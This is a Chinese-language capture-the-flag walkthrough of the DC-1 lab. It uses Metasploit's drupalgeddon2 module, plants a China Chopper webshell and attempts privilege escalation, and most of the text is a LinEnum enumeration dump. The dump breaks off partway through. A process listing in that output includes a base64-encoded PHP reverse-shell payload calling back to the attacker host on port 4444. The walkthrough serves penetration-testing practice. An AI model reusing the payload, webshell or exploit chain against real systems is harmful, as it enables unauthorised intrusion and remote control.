将靶场搭建起来 桥接看不到IP 于是用masscan 进行C段扫描 试试80 8080

访问之后发现是个drupal

掏出msf搜索一波

使用最近年限的exp尝试

 exploit/unix/webapp/drupal_drupalgeddon2

攻击成功 返回meterpreter的shell

进行简单的信息收集

发现并不是root权限 ,想办法进行提权,首先执行常用的Linux提权检查工具

./Linux_Exploit_Suggester.pl

并没有返回可用的提权建议 于是用searchsploit 3.2.0尝试

表红框的exp.c编译并没有成功 提权失败

上菜刀方便查看文件 shell.php

尝试去进行Linux -udf提权

然后想的是用菜刀翻看连接数据库的账户看是否是高权限

/var/www/sites/default/settings.php

发现账号密码 但估计不是高权限

连接尝试

并不是root高权限

然后用Linux 提权检查工具LinEnum.sh 查看弱点

 [00;31m#########################################################[00m
[00;31m#[00m [00;33mLocal Linux Enumeration & Privilege Escalation Script[00m [00;31m#[00m
[00;31m#########################################################[00m
[00;33m# www.rebootuser.com[00m
[00;33m# version 0.95[00m [-] Debug Info
[00;33m[+] Thorough tests = Disabled[00m [00;33mScan started at:
Tue May 7 01:08:48 AEST 2019
[00m [00;33m### SYSTEM ##############################################[00m
[00;31m[-] Kernel information:[00m
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux [00;31m[-] Kernel information (continued):[00m
Linux version 3.2.0-6-486 (debian-kernel@lists.debian.org) (gcc version 4.9.2 (Debian 4.9.2-10+deb7u1) ) #1 Debian 3.2.102-1 [00;31m[-] Specific release information:[00m
PRETTY_NAME="Debian GNU/Linux 7 (wheezy)"
NAME="Debian GNU/Linux"
VERSION_ID="7"
VERSION="7 (wheezy)"
ID=debian
ANSI_COLOR="1;31"
HOME_URL="http://www.debian.org/"
SUPPORT_URL="http://www.debian.org/support/"
BUG_REPORT_URL="http://bugs.debian.org/" [00;31m[-] Hostname:[00m
DC-1 [00;33m### USER/GROUP ##########################################[00m
[00;31m[-] Current user/group info:[00m
uid=33(www-data) gid=33(www-data) groups=33(www-data) [00;31m[-] Users that have previously logged onto the system:[00m
Username Port From Latest
root tty1 Thu Feb 28 12:10:51 +1000 2019 [00;31m[-] Who else is logged on:[00m
01:08:48 up 1:00, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT [00;31m[-] Group memberships:[00m
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
uid=101(Debian-exim) gid=104(Debian-exim) groups=104(Debian-exim)
uid=102(statd) gid=65534(nogroup) groups=65534(nogroup)
uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
uid=104(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=105(mysql) gid=109(mysql) groups=109(mysql)
uid=1001(flag4) gid=1001(flag4) groups=1001(flag4) [00;31m[-] Contents of /etc/passwd:[00m
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:104::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash [00;31m[-] Super user account(s):[00m
root [00;31m[-] Are permissions on /home directories lax:[00m
total 12K
drwxr-xr-x 3 root root 4.0K Feb 19 23:51 .
drwxr-xr-x 23 root root 4.0K Feb 19 22:34 ..
drwxr-xr-x 2 flag4 flag4 4.0K Feb 19 23:28 flag4 [00;31m[-] Root is allowed to login via SSH:[00m
PermitRootLogin yes [00;33m### ENVIRONMENTAL #######################################[00m
[00;31m[-] Environment information:[00m
APACHE_PID_FILE=/var/run/apache2.pid
APACHE_RUN_USER=www-data
APACHE_LOG_DIR=/var/log/apache2
PATH=/usr/local/bin:/usr/bin:/bin
PWD=/var/www
APACHE_RUN_GROUP=www-data
LANG=C
SHLVL=1
APACHE_LOCK_DIR=/var/lock/apache2
APACHE_RUN_DIR=/var/run/apache2
_=/usr/bin/env [00;31m[-] Path information:[00m
/usr/local/bin:/usr/bin:/bin [00;31m[-] Available shells:[00m
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash [00;31m[-] Current umask value:[00m
0022
u=rwx,g=rx,o=rx [00;31m[-] umask value as specified in /etc/login.defs:[00m
UMASK 022 [00;31m[-] Password and storage information:[00m
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512 [00;33m### JOBS/TASKS ##########################################[00m
[00;31m[-] Cron jobs:[00m
-rw-r--r-- 1 root root 722 Jul 4 2012 /etc/crontab /etc/cron.d:
total 16
drwxr-xr-x 2 root root 4096 Feb 19 23:01 .
drwxr-xr-x 85 root root 4096 May 7 00:08 ..
-rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder
-rw-r--r-- 1 root root 510 May 10 2018 php5 /etc/cron.daily:
total 68
drwxr-xr-x 2 root root 4096 Feb 19 23:01 .
drwxr-xr-x 85 root root 4096 May 7 00:08 ..
-rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder
-rwxr-xr-x 1 root root 633 May 30 2018 apache2
-rwxr-xr-x 1 root root 14985 Oct 24 2014 apt
-rwxr-xr-x 1 root root 314 Nov 5 2012 aptitude
-rwxr-xr-x 1 root root 355 Jun 11 2012 bsdmainutils
-rwxr-xr-x 1 root root 256 May 3 2016 dpkg
-rwxr-xr-x 1 root root 4125 Feb 11 2018 exim4-base
-rwxr-xr-x 1 root root 89 May 17 2012 logrotate
-rwxr-xr-x 1 root root 1365 Jun 19 2012 man-db
-rwxr-xr-x 1 root root 606 Sep 25 2010 mlocate
-rwxr-xr-x 1 root root 249 May 26 2012 passwd /etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Feb 19 22:25 .
drwxr-xr-x 85 root root 4096 May 7 00:08 ..
-rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder /etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Feb 19 22:25 .
drwxr-xr-x 85 root root 4096 May 7 00:08 ..
-rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder /etc/cron.weekly:
total 16
drwxr-xr-x 2 root root 4096 Feb 19 22:25 .
drwxr-xr-x 85 root root 4096 May 7 00:08 ..
-rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder
-rwxr-xr-x 1 root root 907 Jun 19 2012 man-db [00;31m[-] Crontab contents:[00m
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do. SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
# [00;33m### NETWORKING ##########################################[00m
[00;31m[-] Network and IP info:[00m
eth0 Link encap:Ethernet HWaddr 00:0c:29:d1:f4:98
inet addr:192.168.16.107 Bcast:192.168.16.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fed1:f498/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:8702 errors:0 dropped:0 overruns:0 frame:0
TX packets:3009 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1325354 (1.2 MiB) TX bytes:1103771 (1.0 MiB) lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:50 errors:0 dropped:0 overruns:0 frame:0
TX packets:50 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:4852 (4.7 KiB) TX bytes:4852 (4.7 KiB) [00;31m[-] ARP history:[00m
192.168.16.254 dev eth0 lladdr 00:22:aa:d0:dd:95 REACHABLE
192.168.16.112 dev eth0 lladdr f0:18:98:6b:ed:5b REACHABLE [00;31m[-] Nameserver(s):[00m
nameserver 192.168.16.254
nameserver 0.0.0.0 [00;31m[-] Default route:[00m
default via 192.168.16.254 dev eth0 [00;31m[-] Listening TCP:[00m
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:40858 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 480 192.168.16.107:33469 192.168.16.112:4444 ESTABLISHED 3406/php
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 ::1:25 :::* LISTEN -
tcp6 0 0 :::34190 :::* LISTEN -
tcp6 0 0 :::111 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 192.168.16.107:80 192.168.16.112:52090 TIME_WAIT -
tcp6 1 0 192.168.16.107:80 192.168.16.112:63539 CLOSE_WAIT - [00;31m[-] Listening UDP:[00m
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:59942 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp 0 0 0.0.0.0:111 0.0.0.0:* -
udp 0 0 0.0.0.0:769 0.0.0.0:* -
udp 0 0 127.0.0.1:801 0.0.0.0:* -
udp 0 0 0.0.0.0:21881 0.0.0.0:* -
udp6 0 0 :::52815 :::* -
udp6 0 0 :::28256 :::* -
udp6 0 0 :::111 :::* -
udp6 0 0 :::769 :::* - [00;33m### SERVICES #############################################[00m
[00;31m[-] Running processes:[00m
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 2296 780 ? Ss 00:08 0:01 init [2]
root 2 0.0 0.0 0 0 ? S 00:08 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 00:08 0:00 [ksoftirqd/0]
root 4 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/0:0]
root 6 0.0 0.0 0 0 ? S 00:08 0:00 [watchdog/0]
root 7 0.0 0.0 0 0 ? S< 00:08 0:00 [cpuset]
root 8 0.0 0.0 0 0 ? S< 00:08 0:00 [khelper]
root 9 0.0 0.0 0 0 ? S 00:08 0:00 [kdevtmpfs]
root 10 0.0 0.0 0 0 ? S< 00:08 0:00 [netns]
root 11 0.0 0.0 0 0 ? S 00:08 0:00 [sync_supers]
root 12 0.0 0.0 0 0 ? S 00:08 0:00 [bdi-default]
root 13 0.0 0.0 0 0 ? S< 00:08 0:00 [kintegrityd]
root 14 0.0 0.0 0 0 ? S< 00:08 0:00 [kblockd]
root 15 0.0 0.0 0 0 ? S 00:08 0:00 [khungtaskd]
root 16 0.0 0.0 0 0 ? S 00:08 0:00 [kswapd0]
root 17 0.0 0.0 0 0 ? SN 00:08 0:00 [ksmd]
root 18 0.0 0.0 0 0 ? S 00:08 0:00 [fsnotify_mark]
root 19 0.0 0.0 0 0 ? S< 00:08 0:00 [crypto]
root 95 0.0 0.0 0 0 ? S 00:08 0:00 [khubd]
root 105 0.0 0.0 0 0 ? S< 00:08 0:00 [ata_sff]
root 115 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_0]
root 125 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_1]
root 134 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_2]
root 135 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_3]
root 136 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_4]
root 137 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_5]
root 138 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_6]
root 139 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_7]
root 140 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_8]
root 141 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_9]
root 142 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_10]
root 143 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_11]
root 144 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_12]
root 145 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_13]
root 146 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_14]
root 147 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_15]
root 148 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_16]
root 149 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_17]
root 150 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_18]
root 151 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_19]
root 152 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_20]
root 153 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_21]
root 154 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_22]
root 155 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_23]
root 156 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_24]
root 157 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_25]
root 158 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_26]
root 159 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_27]
root 160 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_28]
root 161 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_29]
root 162 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_30]
root 163 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_31]
root 190 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/u:29]
root 191 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/u:30]
root 308 0.0 0.0 0 0 ? S 00:08 0:00 [jbd2/sda1-8]
root 309 0.0 0.0 0 0 ? S< 00:08 0:00 [ext4-dio-unwrit]
root 458 0.0 0.1 2688 1244 ? Ss 00:08 0:00 udevd --daemon
root 543 0.0 0.0 0 0 ? S< 00:08 0:00 [ttm_swap]
root 699 0.0 0.0 0 0 ? S< 00:08 0:00 [kpsmoused]
root 1866 0.0 0.0 2388 904 ? Ss 00:08 0:00 /sbin/rpcbind -w
statd 1897 0.0 0.1 2660 1280 ? Ss 00:08 0:00 /sbin/rpc.statd
root 1902 0.0 0.0 2684 888 ? S 00:08 0:00 udevd --daemon
root 1903 0.0 0.0 0 0 ? S< 00:08 0:00 [rpciod]
root 1905 0.0 0.0 0 0 ? S< 00:08 0:00 [nfsiod]
root 1912 0.0 0.0 2592 568 ? Ss 00:08 0:00 /usr/sbin/rpc.idmapd
root 2215 0.0 0.2 28352 2080 ? Sl 00:08 0:00 /usr/sbin/rsyslogd -c5
root 2267 0.0 0.0 1892 608 ? Ss 00:08 0:00 /usr/sbin/acpid
root 2303 0.0 0.8 43680 8928 ? Ss 00:08 0:00 /usr/sbin/apache2 -k start
daemon 2347 0.0 0.0 2168 316 ? Ss 00:08 0:00 /usr/sbin/atd
103 2353 0.0 0.0 3032 644 ? Ss 00:08 0:00 /usr/bin/dbus-daemon --system
www-data 2381 0.0 1.3 48448 14420 ? S 00:08 0:00 /usr/sbin/apache2 -k start
www-data 2382 0.0 1.2 47424 13408 ? S 00:08 0:00 /usr/sbin/apache2 -k start
www-data 2383 0.0 1.4 47676 14836 ? S 00:08 0:01 /usr/sbin/apache2 -k start
www-data 2384 0.0 1.1 46148 12080 ? S 00:08 0:00 /usr/sbin/apache2 -k start
root 2438 0.0 0.0 3852 988 ? Ss 00:08 0:00 /usr/sbin/cron
root 2493 0.0 0.0 1948 588 ? S 00:08 0:00 /bin/sh /usr/bin/mysqld_safe
mysql 2831 0.0 4.7 329380 49184 ? Sl 00:08 0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
root 2832 0.0 0.0 1868 604 ? S 00:08 0:00 logger -t mysqld -p daemon.error
101 3228 0.0 0.0 7424 992 ? Ss 00:08 0:00 /usr/sbin/exim4 -bd -q30m
root 3281 0.0 0.0 3796 840 tty2 Ss+ 00:08 0:00 /sbin/getty 38400 tty2
root 3282 0.0 0.0 3796 836 tty3 Ss+ 00:08 0:00 /sbin/getty 38400 tty3
root 3283 0.0 0.0 3796 840 tty4 Ss+ 00:08 0:00 /sbin/getty 38400 tty4
root 3284 0.0 0.0 3796 836 tty5 Ss+ 00:08 0:00 /sbin/getty 38400 tty5
root 3285 0.0 0.0 3796 840 tty6 Ss+ 00:08 0:00 /sbin/getty 38400 tty6
root 3287 0.0 0.0 0 0 ? S 00:08 0:00 [flush-8:0]
root 3298 0.0 0.2 5196 2320 ? Ss 00:08 0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0
root 3339 0.0 0.1 6496 1076 ? Ss 00:08 0:00 /usr/sbin/sshd
root 3354 0.0 0.0 3796 840 tty1 Ss+ 00:09 0:00 /sbin/getty 38400 tty1
www-data 3358 0.0 1.5 49688 15620 ? S 00:18 0:00 /usr/sbin/apache2 -k start
www-data 3360 0.0 1.1 45892 11832 ? S 00:18 0:00 /usr/sbin/apache2 -k start
www-data 3361 0.0 1.6 51624 16812 ? S 00:18 0:00 /usr/sbin/apache2 -k start
www-data 3381 0.0 1.1 45892 11828 ? S 00:32 0:00 /usr/sbin/apache2 -k start
www-data 3385 0.0 1.2 47436 13392 ? S 00:32 0:00 /usr/sbin/apache2 -k start
www-data 3386 0.0 1.2 47416 13320 ? S 00:32 0:00 /usr/sbin/apache2 -k start
www-data 3405 0.0 0.0 1948 540 ? S 00:39 0:00 sh -c php -r 'eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMTYuMTEyJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNr.KCJObGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));'
www-data 3406 0.0 0.8 41132 9032 ? S 00:39 0:01 php -r eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMTYuMTEyJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNr.KCJObGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));
www-data 3408 0.0 0.0 1948 520 ? S 00:40 0:00 sh -c /bin/sh
www-data 3409 0.0 0.0 1948 576 ? S 00:40 0:00 /bin/sh
root 3488 0.0 0.0 0 0 ? S 01:01 0:00 [kworker/0:1]
root 4393 0.0 0.0 0 0 ? S 01:07 0:00 [kworker/0:2]
www-data 4398 0.0 0.1 3500 1764 ? S 01:08 0:00 /bin/bash ./LinEnum.sh
www-data 4399 0.0 0.1 3552 1380 ? S 01:08 0:00 /bin/bash ./LinEnum.sh
www-data 4400 0.0 0.0 1876 452 ? S 01:08 0:00 tee -a
www-data 4570 0.0 0.1 3536 1092 ? S 01:08 0:00 /bin/bash ./LinEnum.sh
www-data 4571 0.0 0.0 2832 996 ? R 01:08 0:00 ps aux [00;31m[-] Process binaries and associated permissions (from above list):[00m
-rwxr-xr-x 1 root root 941252 Oct 27 2016 /bin/bash
lrwxrwxrwx 1 root root 4 Mar 1 2012 /bin/sh -> dash
-rwxr-xr-x 2 root root 26684 Dec 10 2012 /sbin/getty
-rwxr-xr-x 1 root root 68180 May 22 2013 /sbin/rpc.statd
-rwxr-xr-x 1 root root 42836 May 10 2017 /sbin/rpcbind
-rwxr-xr-x 1 root root 436576 Feb 10 2015 /usr/bin/dbus-daemon
-rwxr-xr-x 1 root root 42748 Apr 16 2013 /usr/sbin/acpid
lrwxrwxrwx 1 root root 34 May 30 2018 /usr/sbin/apache2 -> ../lib/apache2/mpm-prefork/apache2
-rwxr-xr-x 1 root root 21812 Oct 4 2014 /usr/sbin/atd
-rwxr-xr-x 1 root root 43020 Jul 4 2012 /usr/sbin/cron
-rwsr-xr-x 1 root root 937564 Feb 11 2018 /usr/sbin/exim4
-rwxr-xr-x 1 root root 10585256 Apr 20 2018 /usr/sbin/mysqld
-rwxr-xr-x 1 root root 28832 May 22 2013 /usr/sbin/rpc.idmapd
-rwxr-xr-x 1 root root 388200 Oct 8 2014 /usr/sbin/rsyslogd
-rwxr-xr-x 1 root root 531888 Jan 27 2018 /usr/sbin/sshd [00;31m[-] /etc/init.d/ binary permissions:[00m
total 280
drwxr-xr-x 2 root root 4096 Feb 19 23:01 .
drwxr-xr-x 85 root root 4096 May 7 00:08 ..
-rw-r--r-- 1 root root 1586 Feb 19 23:02 .depend.boot
-rw-r--r-- 1 root root 669 Feb 19 23:02 .depend.start
-rw-r--r-- 1 root root 769 Feb 19 23:02 .depend.stop
-rw-r--r-- 1 root root 2427 Oct 16 2012 README
-rwxr-xr-x 1 root root 2227 Apr 16 2013 acpid
-rwxr-xr-x 1 root root 7820 May 26 2018 apache2
-rwxr-xr-x 1 root root 1071 Jun 25 2011 atd
-rwxr-xr-x 1 root root 1276 Oct 16 2012 bootlogs
-rwxr-xr-x 1 root root 1281 Jul 15 2013 bootmisc.sh
-rwxr-xr-x 1 root root 3816 Jul 15 2013 checkfs.sh
-rwxr-xr-x 1 root root 1099 Jul 15 2013 checkroot-bootclean.sh
-rwxr-xr-x 1 root root 9673 Jul 15 2013 checkroot.sh
-rwxr-xr-x 1 root root 1379 Dec 9 2011 console-setup
-rwxr-xr-x 1 root root 3033 Jul 3 2012 cron
-rwxr-xr-x 1 root root 2813 Feb 6 2015 dbus
-rwxr-xr-x 1 root root 6435 Feb 11 2018 exim4
-rwxr-xr-x 1 root root 1329 Oct 16 2012 halt
-rwxr-xr-x 1 root root 1423 Oct 16 2012 hostname.sh
-rwxr-xr-x 1 root root 3880 Dec 10 2012 hwclock.sh
-rwxr-xr-x 1 root root 7592 Apr 28 2012 kbd
-rwxr-xr-x 1 root root 1591 Oct 1 2012 keyboard-setup
-rwxr-xr-x 1 root root 1293 Oct 16 2012 killprocs
-rwxr-xr-x 1 root root 1990 May 21 2012 kmod
-rwxr-xr-x 1 root root 2405 Sep 26 2016 mcstrans
